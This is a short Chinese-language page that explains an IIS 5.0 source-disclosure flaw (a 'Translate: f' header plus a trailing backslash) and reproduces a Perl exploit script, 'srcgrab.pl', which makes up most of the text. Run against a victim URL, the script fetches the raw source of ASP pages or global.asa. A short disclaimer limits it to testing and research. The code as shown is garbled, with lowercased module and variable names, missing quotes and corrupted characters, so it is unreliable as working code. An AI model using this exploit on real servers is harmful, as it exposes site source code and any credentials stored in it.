IDC资讯中心
iis5的asp泄露
当 iis 5.0 接收到一个特殊格式的头 (translate: f) 的 http 请求,同时 ur
l 末尾包含一个特殊字符时,iis 会使用错误的处理方法导致文件源代码泄漏。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自
负
#!/usr/bin/perl
# expl0it by smiler@vxd.org
# tested with sucess against iis 5.0. maybe it works against iis 4.0 u
sing a shared drive but i haven磘 tested it yet.
# get the source code of any script from the server using this exploit
.
# this code was written after daniel docekal brought this issue in bug
traq.
# cheers 351 and fractalg 🙂
if (not $argv[0]) {
print qq~
geee it磗 running !! kewl :)))
usage : srcgrab.pl example usage : srcgrab.pl http://www.victimsite.co
m/global.asa
u can also save the retrieved file using : srcgrab.pl http://www.victi
m.com/default.asp > file_to_save
~; exit;}
$victimurl=$argv[0];
# create a user agent object
use lwp::useragent;
$ua = new lwp::useragent;
# create a request
my $req = new http::request get => $victimurl . \\; # here is the ba
ckslash at the end of the url 😉
$req->content_type(application/x-www-form-urlencoded);
$req->content_type(text/html);
$req->header(translate => f); # here is the famous translate header
:))
$req->content(match=www&errors=0);
# pass request to the user agent and get a response back
my $res = $ua->request($req);
# check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_html;
}
